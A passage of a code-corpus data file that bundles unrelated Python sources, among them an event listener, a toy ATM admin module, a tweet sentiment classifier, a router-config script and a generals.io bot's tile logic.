):\n\t\tself.connected_events = []\n\t\tself.connected_objects = []\n\t#end\n\t\n\t@staticmethod\n\tdef BLOCKEVENTS( eventName = None ):\n\t\tif not eventName : EventsListener.BLOCK_EVENTS = True\n\t\telse : EventsListener.BLOCKED_EVENTS.append( eventName )\n\t#end\n\t\n\t@staticmethod\n\tdef UNBLOCKEVENTS( eventName = None ):\n\t\tif not eventName : EventsListener.BLOCK_EVENTS = False\n\t\telse : EventsListener.BLOCKED_EVENTS.remove( eventName )\n\t#end\n\n\t@staticmethod\n\tdef EVENT( eventName, *args, **kargs ):\n\t\tif EventsListener.BLOCK_EVENTS : return\n\t\tif eventName in EventsListener.BLOCKED_EVENTS : return\n\n\t\twevent = Event( eventName, None, *args, **kargs )\n\t\tfor event in EventsListener.COMMON_EVENTS:\n\t\t\tif eventName == event[ 0 ] : \n\t\t\t\tres = event[ 1 ]( wevent )\n\t\t\t\tif res : return res\n\t#end\n\t\n\tdef disconnectEventsInConnectedObjects( self, eventName, connectedFunc ):\n\t\tfor obj in self.connected_objects :\n\t\t\tif [ eventName, connectedFunc ] in obj.connected_events : \n\t\t\t\tself.disconnect( eventName, connectedFunc, obj )\n\t#end\n\t\n\tdef connect( self, eventName, connectedFunc, objectToConnect = None ):\n\t\tif objectToConnect :\n\t\t\tif not [ eventName, connectedFunc] in objectToConnect.connected_events:\n\t\t\t\tobjectToConnect.connected_events.append( [ eventName, connectedFunc ] )\n\t\t\tif not objectToConnect in self.connected_objects : self.connected_objects.append( objectToConnect )\n\t\telse: EventsListener.COMMON_EVENTS.append( [ eventName, connectedFunc ] )\n\t#end\n\t\n\tdef disconnect( self, eventName, connectedFunc, objectToConnect = None ):\n\t\tif objectToConnect : \n\t\t\tif [ eventName, connectedFunc ] in objectToConnect.connected_events : \n\t\t\t\tobjectToConnect.connected_events.remove( [ eventName, connectedFunc ] )\n\t\telse: \n\t\t\tself.disconnectEventsInConnectedObjects( eventName, connectedFunc )\n\t\t\tif [ eventName, connectedFunc ] in EventsListener.COMMON_EVENTS : \n\t\t\t\tEventsListener.COMMON_EVENTS.remove( [ eventName, connectedFunc ] )\n\t#end\n\t\n\tdef event( self, eventName, *args, **kargs ):\n\t\tif EventsListener.BLOCK_EVENTS : return\n\t\tif eventName in EventsListener.BLOCKED_EVENTS : return\n\t\t\n\t\twevent = Event( eventName, self, *args, **kargs )\n\t\t\n\t\tif hasattr( self, eventName ) : getattr( self, eventName )( wevent )\n\t\t\n\t\tcommon_event = True\n\t\tfor event in self.connected_events:\n\t\t\tif eventName == event[ 0 ] : \n\t\t\t\tcommon_event = False\n\t\t\t\tevent[ 1 ]( wevent )\n\n\t\tif common_event :\n\t\t\tfor event in EventsListener.COMMON_EVENTS:\n\t\t\t\tif eventName == event[ 0 ] : event[ 1 ]( wevent )\n\n\t#end\n\n\tdef eventResult( self, eventName, *args, **kargs ):\n\t\tresult = None\n\t\tif EventsListener.BLOCK_EVENTS : return result\n\t\tif eventName in EventsListener.BLOCKED_EVENTS : return result\n\t\t\n\t\twevent = Event( eventName, self, *args, **kargs )\n\t\t\n\t\tif hasattr( self, eventName ) : return getattr( self, eventName )( wevent )\n\t\t\n\t\tfor event in self.connected_events:\n\t\t\tif eventName == event[ 0 ] : return event[ 1 ]( wevent )\n\n\t\tfor event in EventsListener.COMMON_EVENTS:\n\t\t\tif eventName == event[ 0 ] : return event[ 1 ]( wevent )\n\n\t#end\n\n\t\n#end class EventsListener","sub_path":"res/scripts/client/System/Events.py","file_name":"Events.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"634270810","text":"#管理员\r\nfrom time import sleep\r\n\r\nclass Admin(object):\r\n adminUserName = \"admin\"\r\n adminPassed = \"admin\"\r\n adminConfirmID = \"1234abcd\"\r\n\r\n def __init__(self, allUsers):\r\n self.allUsers = allUsers\r\n\r\n #开机\r\n def boot(self, times = 2):\r\n inputData = input(\"输入“boot”开机:\")\r\n while times > 0:\r\n\r\n if inputData == \"boot\":\r\n print(\"开机成功……\")\r\n return True\r\n else:\r\n print(\"输入有误!!您还有 %d 次机会,请重新输入……\" %(times))\r\n times -= 1\r\n inputData = input(\"输入“boot”开机:\")\r\n print(\"次数用尽!!开机失败……\")\r\n return False\r\n\r\n #管理员登录验证\r\n def adminLogin(self):\r\n inputAdminUserName = input(\"请输入管理员账户:\")\r\n if inputAdminUserName != self.adminUserName:\r\n input(\"管理员账户有误,登陆失败!!按任意键继续……\")\r\n return False\r\n inputAdminPassed = input(\"请输入管理员密码:\")\r\n if inputAdminPassed != self.adminPassed:\r\n input(\"管理员密码有误,登陆失败!!按任意键继续……\")\r\n return False\r\n print(\"登陆成功!!请稍等……\")\r\n sleep(1)\r\n print(\"-----------------------管理员须知-----------------------\")\r\n print(\"您好,这里是管理员须知。\\n\"\r\n \"作为管理员,请确认您是合法途径进入该系统且所有操作均合法。\\n\"\r\n \"您需做到以下几点:\\n\"\r\n \" • 1、不随意复制用户信息。\\n\"\r\n \" • 2、不随意传播用户信息。\\n\"\r\n \" • 3、不随意修改用户信息。\\n\"\r\n \" • 4、不随意删除用户信息。\\n\"\r\n \" • 5、不得随意删库!!!\")\r\n print(\"--------------------------------------------------------\")\r\n input(\"请谨慎操作!!按任意键继续……\")\r\n return True\r\n\r\n #更多(管理员操作)\r\n def more(self):\r\n if not self.adminLogin():\r\n return -1\r\n self.printAdminView()\r\n choice = input(\"请选择:\")\r\n if choice == \"all\":\r\n self.showAllUsersInfor()\r\n elif choice == \"delAll\":\r\n self.delAllUsers()\r\n else:\r\n print(\"输入有误!!正在返回首页……\")\r\n\r\n #查询用户信息\r\n def searchUserInfor(self):\r\n inputUserName = input(\"请输入用户姓名:\")\r\n print(\"-----------------------查询结果-----------------------\\n\")\r\n for i in self.allUsers:\r\n if inputUserName != self.allUsers[i].name:\r\n print(\"查无此人!!操作失败……\\n\")\r\n return -1\r\n print(\"姓名:%s 卡号:%s 身份证号:%s 电话:%s\" % (self.allUsers[i].name, self.allUsers[i].card.cardID, self.allUsers[i].idCard, self.allUsers[i].phoneNum))\r\n print(\"\\n------------------------------------------------------\\n\")\r\n\r\n #展示所有用户\r\n def showAllUsersInfor(self):\r\n print(\"---------------------用户信息---------------------\")\r\n print(\" 用户数:%d 总金额:%d\\n\" % (len(self.allUsers), self.dataStatistics()))\r\n for i in self.allUsers:\r\n print(\"姓名:%s 卡号:%s 余额:%d\" % (\r\n self.allUsers[i].name, self.allUsers[i].card.cardID, self.allUsers[i].card.cardMoney))\r\n print(\"电话号码:%s 身份证号:%s\\n\" % (self.allUsers[i].phoneNum, self.allUsers[i].idCard))\r\n print(\"--------------------------------------------------\\n\")\r\n\r\n #删除单个用户\r\n def delOneUser(self):\r\n inputAdminConfirmID = input(\"请输入管理员验证码:\")\r\n if inputAdminConfirmID != self.adminConfirmID:\r\n print(\"验证码错误!!删除失败……\")\r\n return -1\r\n print(\"-------------------危险操作!!-------------------\")\r\n print(\" 用户数:%d 总金额:%d\\n\" % (len(self.allUsers), self.dataStatistics()))\r\n for i in self.allUsers:\r\n print(\"姓名:%s 卡号:%s 余额:%d\" % (\r\n self.allUsers[i].name, self.allUsers[i].card.cardID, self.allUsers[i].card.cardMoney))\r\n print(\"--------------------------------------------------\\n\")\r\n inputDelUserCardID = input(\"请输入要删除账户卡号:\")\r\n if inputDelUserCardID not in self.allUsers:\r\n print(\"无此卡号,操作失败……\")\r\n return -1\r\n if not self.confirmOperation():\r\n print(\"------------------取消成功!!------------------\")\r\n return -1\r\n del(self.allUsers[i])\r\n print(\"删除成功!!正在返回……\")\r\n\r\n #删除所有用户\r\n def delAllUsers(self):\r\n inputAdminConfirmID = input(\"请输入管理员验证码:\")\r\n if inputAdminConfirmID != self.adminConfirmID:\r\n print(\"验证码错误!!删除失败……\")\r\n return -1\r\n print(\"-------------------危险操作!!-------------------\")\r\n print(\" 目前用户数:%d 总金额:%d\\n\" % (len(self.allUsers), self.dataStatistics()))\r\n if not self.confirmOperation():\r\n print(\"------------------取消成功!!------------------\")\r\n return -1\r\n if not self.confirmOperation():\r\n print(\"------------------取消成功!!------------------\")\r\n return -1\r\n self.allUsers = {}\r\n print(\"努力删库中……\")\r\n sleep(2)\r\n print(\"------------------删库成功!!------------------\")\r\n print(\"正在返回首页面……\")\r\n sleep(1)\r\n\r\n #数据统计\r\n def dataStatistics(self):\r\n sumMoney = 0\r\n userAmount = len(self.allUsers)\r\n for i in self.allUsers:\r\n sumMoney += self.allUsers[i].card.cardMoney\r\n return sumMoney\r\n\r\n #\r\n\r\n #操作确认\r\n def confirmOperation(self):\r\n choice = input(\"确认执行此操作?(yes / no): \")\r\n if choice == \"yes\":\r\n return True\r\n elif choice == \"no\":\r\n return False\r\n else:\r\n print(\"输入有误!!操作结束……\")\r\n return False\r\n\r\n\r\n\r\n","sub_path":"自主ATM机系统/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"573683459","text":"from . import BaseHandler\nfrom tools.DBHandler import PostgresConnection\n\n\nclass ConnectionHander(BaseHandler):\n\n def process(self):\n \"\"\"创建事务连接\"\"\"\n pool_key = self.get_query_argument('pool_key', '')\n key = self.get_query_argument('key', '')\n if not key:\n raise Exception(\"创建连接时,参数 key 不能为空!\")\n if key in self.conn and self.conn[key]:\n raise Exception(f\"该连接已存在,key: {key}\")\n if not pool_key:\n raise Exception(\"创建连接时,参数 pool_key 不能为空!\")\n if pool_key not in self.pool:\n raise Exception(f\"数据库 key 不存在,key: {key}\")\n self.conn[key] = PostgresConnection(pool_key, key, self.pool[pool_key].get_conn(key))\n return {\n \"key\": key\n }\n","sub_path":"DbCacheServer/api/ConnectionHandler.py","file_name":"ConnectionHandler.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"205025364","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\nimport scipy\nimport nltk\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nimport re\n\n\n# In[2]:\n\ntrain_twitter_path = \"/Users/hannnnn/Desktop/knowledge_technologies/Assignment2/2017S1-KTproj2-data/train-tweets.txt\"\ntrain_twitter_sem_path = \"/Users/hannnnn/Desktop/knowledge_technologies/Assignment2/2017S1-KTproj2-data/train-labels.txt\"\ndev_twitter_path = \"/Users/hannnnn/Desktop/knowledge_technologies/Assignment2/2017S1-KTproj2-data/dev-tweets.txt\"\ndev_twitter_sem_path = \"/Users/hannnnn/Desktop/knowledge_technologies/Assignment2/2017S1-KTproj2-data/dev-labels.txt\"\ntest_twitter_path = \"/Users/hannnnn/Desktop/knowledge_technologies/Assignment2/2017S1-KTproj2-data/test-tweets.txt\"\n\n\n# In[3]:\n\ntrain_twitter = open(train_twitter_path,encoding=\"utf-8\")\ntrain_twitter_sem = open(train_twitter_sem_path,encoding=\"utf-8\")\ndev_twitter = open(dev_twitter_path,encoding=\"utf-8\")\ndev_twitter_sem = open(dev_twitter_sem_path,encoding=\"utf-8\")\ntest_twitter = open(test_twitter_path,encoding=\"utf-8\")\nsem_result = open('/Users/hannnnn/Desktop/test-labels.txt', 'w')\ntry:\n all_train_twitter = train_twitter.readlines()\n all_train_twitter_sem = train_twitter_sem.readlines()\n all_dev_twitter = dev_twitter.readlines()\n all_dev_twitter_sem = dev_twitter_sem.readlines()\n all_test_twitter = test_twitter.readlines()\nfinally: \n train_twitter.close()\n train_twitter_sem.close()\n dev_twitter.close()\n dev_twitter_sem.close()\n test_twitter.close\n# print(len(all_train_twitter))\n# print(len(all_train_twitter_sem))\n# print(len(all_dev_twitter))\n# print(len(all_dev_twitter_sem))\n# print(len(all_test_twitter))\n\n\n\n# In[4]:\n\npattern = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')\nstart_num = 0\n_all_train_twitter = []\n_all_dev_twitter = []\n_all_test_twitter = []\nfor sentence in all_train_twitter:\n _all_train_twitter.append(pattern.sub(\"\",sentence))\nfor sentence in all_dev_twitter:\n _all_dev_twitter.append(pattern.sub(\"\",sentence))\nfor sentence in all_test_twitter:\n _all_test_twitter.append(pattern.sub(\"\",sentence))\n\n# print(len(_all_train_twitter))\n# print(len(all_train_twitter_sem))\n# print(len(_all_dev_twitter))\n# print(len(all_dev_twitter_sem))\n\n\n\n# In[5]:\n\ntrain_words = []\ntrain_sem = []\ndev_words = []\ndev_sem = []\ntest_words = []\nstart_num = 0\nfor each_word in _all_train_twitter:\n if start_num < len(_all_train_twitter):\n temp = _all_train_twitter[start_num].split(\"\\t\")\n temp[1] = temp[1][:-1]\n train_words.append(temp[:2])\n start_num = start_num + 1\n# print(len(train_words))\n# print(train_words)\n\nstart_num = 0\nfor each_word in all_train_twitter_sem:\n if start_num < len(all_train_twitter_sem):\n temp = all_train_twitter_sem[start_num].split(\"\\t\")\n temp[1] = temp[1][:-1]\n train_sem.append(temp[:2])\n start_num = start_num + 1\n# print(len(train_sem))\n# print(train_sem)\n\nstart_num = 0\nfor each_word in _all_dev_twitter:\n if start_num < len(_all_dev_twitter):\n temp = _all_dev_twitter[start_num].split(\"\\t\")\n temp[1] = temp[1][:-1]\n dev_words.append(temp[:2])\n start_num = start_num + 1\n# print(len(dev_words))\n# print(dev_words)\n\nstart_num = 0\nfor each_word in all_dev_twitter_sem:\n if start_num < len(all_dev_twitter_sem):\n temp = all_dev_twitter_sem[start_num].split(\"\\t\")\n temp[1] = temp[1][:-1]\n dev_sem.append(temp[:2])\n start_num = start_num + 1\n# print(len(dev_sem))\n# print(dev_sem)\n\nstart_num = 0\nfor each_word in _all_test_twitter:\n if start_num < len(_all_test_twitter):\n temp = _all_test_twitter[start_num].split(\"\\t\")\n temp[1] = temp[1][:-1]\n test_words.append(temp[:2])\n start_num = start_num + 1\n# print(len(test_words))\n# print(test_words)\n\n\n# In[6]:\n\ntrain_feature_sents = []\ntrain_sem_sents = []\ndev_feature_sents = []\ndev_sem_sents = []\ntest_feature_sents = []\nfor sents in train_words:\n train_feature_sents.append(sents[1])\n\n# print(train_feature_sents)\n# print(len(train_feature_sents))\n \nfor sents in train_sem:\n if sents[1] == \"negative\":\n train_sem_sents.append(\"-1\")\n if sents[1] == \"positive\":\n train_sem_sents.append(\"1\")\n if sents[1] == \"neutral\":\n train_sem_sents.append(\"0\")\n\n# print(train_sem_sents)\n# print(len(train_sem_sents))\n\nfor sents in dev_words:\n dev_feature_sents.append(sents[1])\n \n# print(dev_feature_sents)\n# print(len(dev_feature_sents))\n\nfor sents in dev_sem:\n if sents[1] == \"negative\":\n dev_sem_sents.append(\"-1\")\n if sents[1] == \"positive\":\n dev_sem_sents.append(\"1\")\n if sents[1] == \"neutral\":\n dev_sem_sents.append(\"0\")\n \n# print(dev_sem_sents)\n# print(len(dev_sem_sents))\n\nfor sents in test_words:\n test_feature_sents.append(sents[1])\n\n# print(test_feature_sents)\n# print(len(test_feature_sents))\n\n\n# In[7]:\n\ndef tokenize_words(text):\n from nltk.tokenize import sent_tokenize\n from nltk.tokenize import word_tokenize\n\n from nltk.stem.lancaster import LancasterStemmer \n lancaster_stemmer = LancasterStemmer() \n\n sent_tokenize_list = sent_tokenize(text)\n word_tokenize_list = []\n for sents in sent_tokenize_list:\n word_tokenize_list = word_tokenize_list + word_tokenize(sents)\n\n \n pattern1 = re.compile(r\"[\\W]+\")\n pattern2 = re.compile(r\"\\d\")\n pattern3 = re.compile(r\"^[a-z]+$\")\n word_list = []\n\n for word in word_tokenize_list:\n word1 = pattern1.sub(\"\",word)\n word2 = pattern2.sub(\"\",word)\n word3 = pattern3.match(word)\n if word1 != \"\":\n if word2 != \"\":\n if word3 != None:\n if len(word) > 3:\n word_list.append(lancaster_stemmer.stem(word))\n return word_list\n\n\n# In[8]:\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nvec=TfidfVectorizer(max_df=0.99,min_df=10,stop_words='english',max_features=5000,analyzer = 'word',tokenizer = tokenize_words)\ntrain_matrix=vec.fit_transform(train_feature_sents).toarray()\ndev_matrix=vec.transform(dev_feature_sents)\ntest_matrix=vec.transform(test_feature_sents)\n\n\n# In[9]:\n\ndef calculate_result(actual,pred):\n print(metrics.classification_report(actual, pred))\n print(metrics.confusion_matrix(actual,pred,labels=[\"-1\",\"0\",\"1\"]))\n\n\n# In[10]:\n\n#Multinomial Naive Bayes Classifier\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn import metrics\nclf = MultinomialNB(alpha = 0.01)\nclf.fit(train_matrix,train_sem_sents)\npred = clf.predict(dev_matrix)\ncalculate_result(dev_sem_sents,pred)\n\n\n# In[11]:\n\n#Decision Tree Classifier\nfrom sklearn import tree\nclf = tree.DecisionTreeClassifier()\nclf.fit(train_matrix,train_sem_sents)\npred = clf.predict(dev_matrix)\ncalculate_result(dev_sem_sents,pred)\n\n\n# In[12]:\n\n#writing the prediction result to file\n#pred_sem_list = []\n#i = 0\n#for word in pred:\n# if word == '1':\n# pred_sem_list.append(\"positive\")\n# i = i+1\n# if word == '0':\n# pred_sem_list.append(\"neutral\")\n# i = i+1\n# if word == '-1':\n# pred_sem_list.append(\"negative\")\n# i = i+1\n#pred_list = []\n#num = 0\n#temp = []\n#for word in all_test_twitter:\n# if num < len(all_test_twitter):\n# temp = word.split(\"\\t\")\n# temp_word = temp[0] +\"\\t\"+ pred_sem_list[num]\n# pred_list.append(temp_word)\n# num = num +1\n#\n#for word in pred_list:\n# sem_result.write(word+\"\\n\")\n\n\n\n# In[ ]:\n\n\n\n","sub_path":"assignment2/assignment-code/KTPro_Assig2.py","file_name":"KTPro_Assig2.py","file_ext":"py","file_size_in_byte":7634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"160489122","text":"a = input()\n\nif a[len(a) - 1] == \" \":\n a = a[:len(a) - 1]\n\nb = []\n\ncon = 0\nwhile True:\n if con == len(a) - 1:\n if a[con] not in b:\n b.append(a[con])\n break\n if a[con] not in b:\n b.append(a[con])\n con += 2\n\nst = \"\"\nfor i in range(len(b)):\n st += b[i] + \",\"\n\nprint(st[:len(st) - 1])","sub_path":"DigitalSkills2018/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"173189637","text":"#!/usr/bin/env python\n#===============================================================================\n# ReadRouterConfigAll\n# \n# Description:\n# Script to open raw export from Matik?, and process file contents into\n# a router-specific configuration file for each router in the raw file,\n# with respect to the script ReadRouterConfig.py.\n#\n# Version:\n# MM.mm DD/MM/YY\n# 00.00 11/08/17 First version with header description\n# 00.01 17/04/19 Remove writeToFileFlag from inputs\n#\n# Example/Usage:\n#\n#\n#===============================================================================\n\nfrom archive.FindListofRouters import createRouterListDevs\nfrom archive.ReadRouterConfig import buildConfigRouter\n\nfrom src.WriteFileRtrAssign import writeLogMessage, writePyFile\n\n\ndef buildAllRouterConfigs(printFlag=False):\n # unit TableSimple function;\n \n # open and read in file\n listRouters, fileDevices, dirDevices = createRouterListDevs(printFlag)\n writeLogMessage('Reading data for all routers from: ' + fileDevices, dirDevices)\n \n qtyRouters = len(listRouters)\n \n for i in range(0,qtyRouters):\n \n # parse out Router name from list\n selectRouter = listRouters[i] #'ASHBBBRJ01'\n \n # build router hardware layout list\n try:\n configRouter = buildConfigRouter(fileDevices, selectRouter)[0]\n # write to file\n fileXt = 'pyCFG.txt'\n writePyFile(dirDevices, selectRouter, configRouter, fileXt)\n except FileNotFoundError:\n continue \n \n writeLogMessage('Script complete.', dirDevices)\n \n \ndef main(printFlag=True):\n buildAllRouterConfigs(printFlag)\n\n\nif __name__ == '__main__':\n main()","sub_path":"archive/ReadRouterConfigAll.py","file_name":"ReadRouterConfigAll.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"443889022","text":"\"\"\"\n @ Harris Christiansen (code@HarrisChristiansen.com)\n Generals.io Automated Client - https://github.com/harrischristiansen/generals-bot\n Tile: Objects for representing Generals IO Tiles\n\"\"\"\nfrom collections import deque\nfrom queue import Queue\nimport time\nimport logging\n\nfrom .constants import *\n\n\nclass Tile(object):\n def __init__(self, game_map, x, y):\n # Public Properties\n self.x = x # Integer X Coordinate\n self.y = y # Integer Y Coordinate\n self.tile = TILE_FOG # Integer Tile Type (TILE_OBSTACLE, TILE_FOG, TILE_MOUNTAIN, TILE_EMPTY, or player_ID)\n self.turn_captured = 0 # Integer Turn Tile Last Captured\n self.turn_held = 0 # Integer Last Turn Held\n self.turn_first_seen = 0 # First turn the tile was visible to us\n self.army = 0 # Integer Army Count\n self.is_city = False # Boolean isCity\n self.is_mountain = False # Whether we know whether this space is a city\n self.is_swamp = False # Boolean isSwamp\n self.is_general = False # Boolean isGeneral\n self.is_basic = False # True once we have confirmed there is no general, city, mountain, or swamp here.\n\n # Private Properties\n self._map = game_map # Pointer to Map Object\n self._general_index = -1 # Player Index if tile is a general\n self._dirty_update_time = 0 # Last time Tile was updated by bot, not server\n self._is_main_force = False\n\n self._distances = {}\n\n def __repr__(self):\n return \"(%2d,%2d)[%2d,%3d]\" % (self.x, self.y, self.tile, self.army)\n\n \"\"\"def __eq__(self, other):\n return (other is not None and self.x==other.x and self.y==other.y)\"\"\"\n\n def __lt__(self, other):\n return self.army < other.army\n\n def set_neighbors(self, game_map):\n self._map = game_map\n self._set_neighbors()\n\n def set_is_swamp(self, is_swamp):\n self.is_swamp = is_swamp\n\n def update(self, game_map, tile, army, is_city=False, is_general=False, is_dirty=False):\n self._map = game_map\n\n if is_dirty:\n self._dirty_update_time = time.time()\n\n if self.tile < 0 or tile >= TILE_MOUNTAIN or (tile < TILE_MOUNTAIN and self.is_self()):\n # Tile should be updated\n if (tile >= 0 or self.tile >= 0) and self.tile != tile: # Remember Discovered Tiles\n self.turn_captured = game_map.turn\n if self.tile >= 0:\n game_map.tiles[self.tile].remove(self)\n if tile >= 0:\n game_map.tiles[tile].append(self)\n if tile == game_map.player_index:\n self.turn_held = game_map.turn\n self.tile = tile\n if self.army == 0 or army > 0 or tile >= TILE_MOUNTAIN or self.is_swamp: # Remember Discovered Armies\n self.army = army\n\n if tile == TILE_MOUNTAIN:\n self.is_mountain = True\n\n if self.tile == TILE_FOG and tile != TILE_FOG and not is_general:\n self.is_basic = True\n\n if is_city:\n self.is_city = True\n self.is_general = False\n if self not in game_map.cities:\n game_map.cities.append(self)\n if self._general_index != -1 and self._general_index < 8:\n game_map.generals[self._general_index] = None\n self._general_index = -1\n elif is_general:\n self.is_general = True\n game_map.generals[tile] = self\n self._general_index = self.tile\n\n if self.turn_first_seen == 0 and tile not in (TILE_FOG, TILE_OBSTACLE):\n self.turn_first_seen = self._map.turn\n\n if self.tile != self._map.player_index:\n self._is_main_force = False\n\n # ======================== Tile Properties ======================== #\n\n def is_dirty(self):\n return (time.time() - self._dirty_update_time) < 0.6\n\n def distance_to(self, dest):\n if dest is not None:\n if dest not in self._distances:\n self._distances[dest] = abs(self.x - dest.x) + abs(self.y - dest.y)\n return self._distances[dest]\n return 0\n\n def neighbors(self, include_swamps=False, include_cities=True, include_obstacles=False):\n neighbors = []\n for tile in self._neighbors:\n if not tile.is_mountain and \\\n (include_swamps or not tile.is_swamp) and \\\n (include_cities or not tile.is_city) and \\\n (include_obstacles or tile.tile != TILE_OBSTACLE):\n neighbors.append(tile)\n return neighbors\n\n def is_valid_target(self): # Check tile to verify reachability\n if self.tile in (TILE_MOUNTAIN, TILE_FOG, TILE_OBSTACLE):\n # if self.is_mountain:\n return False\n # if self.is_swamp and self.turn_held > 0:\n # return False\n for tile in self.neighbors(include_swamps=True):\n if tile.turn_held > 0:\n return True\n # one way to get here is if there is an empty tile in a separate connected component\n # that is visible at a diagonal. Are there other ways to get here?\n return False\n\n def is_empty(self):\n return self.tile == TILE_EMPTY\n\n def is_self(self):\n return self.tile == self._map.player_index\n\n def is_on_team(self):\n return self.tile in self._map.my_team\n\n def is_enemy(self):\n return self.tile >= 0 and not self.is_on_team()\n\n def should_not_attack(self): # DEPRECATED: Use Tile.shouldAttack\n return not self.should_attack()\n\n def should_attack(self):\n \"\"\"\n Checks that this tile is visible, not a mountain, in my connected component,\n does not belong to a teammate, and is not dirty.\n :return:\n \"\"\"\n if not self.is_valid_target():\n # Target is a mountain or is not verified to be in my connected component.\n return False\n if self.is_on_team():\n return False\n if self.tile in self._map.do_not_attack_players:\n return False\n if self.is_dirty():\n return False\n return True\n\n # ======================== Select Neighboring Tile ======================== #\n\n def neighbor_to_attack(self, path=None):\n if path is None:\n path = []\n if not self.is_self():\n return None\n\n target = None\n for neighbor in self.neighbors(include_swamps=True):\n # if target is None:\n # target = neighbor\n # Move into caputurable target Tiles\n if (neighbor.should_attack() and self.army > neighbor.army + 1) or neighbor in path:\n if not neighbor.is_swamp:\n if target is None:\n target = neighbor\n elif neighbor.is_city and (not target.is_city or target.army > neighbor.army) and \\\n (neighbor.unknown_neighbor_count() > 0 or neighbor.army < self.army * 2) :\n target = neighbor\n # Special case, prioritize opponents with 1 army over empty tiles\n elif not neighbor.is_empty and neighbor.army <= 1 and target.is_empty:\n target = neighbor\n elif target.army > neighbor.army and not target.is_city:\n if neighbor.is_empty:\n if target.army > 1:\n target = neighbor\n else:\n target = neighbor\n elif neighbor.turn_held == 0: # Move into swamps that we have never held before\n target = neighbor\n\n return target\n\n # ======================== Select Distant Tile ======================== #\n\n def nearest_tile_in_path(self, path):\n dest = None\n dest_distance = 9999\n for tile in path:\n distance = self.distance_to(tile)\n if distance < tile_distance:\n dest = tile\n dest_distance = distance\n\n return dest\n\n def nearest_target_tile(self):\n if not self.is_self():\n # if the player doesn't own this tile\n return None\n\n max_target_army = self.army * 4 + 14\n\n dest = None\n dest_distance = 9999\n for x in range(self._map.cols): # Check Each Square\n for y in range(self._map.rows):\n tile = self._map.grid[y][x]\n # Non Target Tiles\n if not tile.is_valid_target() or not tile.should_attack() or tile.army > max_target_army:\n continue\n\n distance = self.distance_to(tile)\n if tile.is_general: # Generals appear closer\n distance = distance * 0.09\n elif tile.is_city: # Cities vary distance based on size, but appear closer\n # distance = distance * sorted((0.17, (tile.army / (3.2 * self.army)), 20))[1]\n distance *= 0.3\n\n # if tile.tile == TILE_EMPTY: # Empties appear further away\n # if tile.is_city:\n # distance = distance * 1.6\n # else:\n # distance = distance * 4.3\n\n if tile.army > self.army: # Larger targets appear further away\n distance = distance * (1.6 * tile.army / self.army)\n\n if tile.is_swamp: # Swamps appear further away\n distance = distance * 10 * 9999\n if tile.turn_held > 0: # Swamps which have been held appear even further away\n distance = distance * 3\n\n # Tiles with unknown neighbors appear closer\n # distance *= 4 - tile.unknown_neighbor_count() * 1\n # distance *= 4 - tile.unknown_neighbor_count() * 1\n\n if distance < dest_distance: # ----- Set nearest target -----\n dest = tile\n dest_distance = distance\n # if dest is None:\n # print(\"Tile\", self.x, self.y, \": No Targets\")\n # else:\n # print(\"Tile\", self.x, self.y, \": Targeting tile\", dest.x, dest.y,\n # \"Neighbor cnt: \", dest.unknown_neighbor_count(),\n # \"Neighbors: \", [(neighbor.x, neighbor.y, neighbor.tile) for neighbor in dest._neighbors])\n return dest\n\n def unknown_neighbor_count(self):\n return sum(\n 1 for neighbor in self._neighbors\n if neighbor.tile in (TILE_FOG, TILE_OBSTACLE)\n )\n\n # ======================== Pathfinding ======================== #\n\n def path_to(self, dest, include_cities=False, include_obstacles=False):\n if dest is None:\n return []\n\n frontier: Queue[Tile] = Queue()\n frontier.put(self)\n came_from = {self: None}\n army_count = {self: self.army}\n processed = set()\n\n while not frontier.empty():\n current = frontier.get()\n\n if current == dest: # Found Destination\n break\n\n for next in current.neighbors(\n include_swamps=True,\n include_cities=include_cities,\n include_obstacles=include_obstacles,\n ):\n if next not in processed and (next.is_on_team() or next == dest or next.army < army_count[current]):\n # priority = self.distance(next, dest)\n if next not in came_from:\n frontier.put(next)\n if next.is_on_team():\n next_army_count = army_count[current] + (next.army - 1)\n else:\n next_army_count = army_count[current] - (next.army + 1)\n if next not in army_count or next_army_count > army_count[next]:\n army_count[next] = next_army_count\n came_from[next] = current\n\n processed.add(current)\n\n if dest not in came_from: # Did not find dest\n if include_cities:\n return []\n else:\n return self.path_to(dest, include_cities=True)\n\n # Create Path List\n path = _path_reconstruct(came_from, dest)\n\n self._distances[dest] = len(path)\n return path\n\n def get_swamp_paths(self, armies=1e7):\n \"\"\"\n :param armies: number of armies that an adjacent tile is considering sending here\n :return:\n \"\"\"\n swamp_paths = []\n frontier: Queue[Tile] = Queue()\n frontier.put(self)\n came_from = {self: None}\n\n while not frontier.empty():\n current = frontier.get()\n\n for neighbor in current.neighbors(include_swamps=True, include_cities=True, include_obstacles=True):\n if neighbor in came_from:\n continue\n came_from[neighbor] = current\n if neighbor.is_swamp:\n frontier.put(neighbor)\n\n elif not neighbor.is_mountain and not neighbor.is_on_team():\n path = []\n rev_path_current = neighbor\n while rev_path_current is not None:\n path.append(rev_path_current)\n rev_path_current = came_from[rev_path_current]\n if 2 * (len(path) + 1)< armies:\n path.reverse()\n swamp_paths.append(path)\n\n return swamp_paths\n\n def get_best_swamp_path(self):\n swamp_paths = self.get_swamp_paths()\n if not swamp_paths:\n # The swamp is a dead end or we've already explored the other sides\n return []\n # 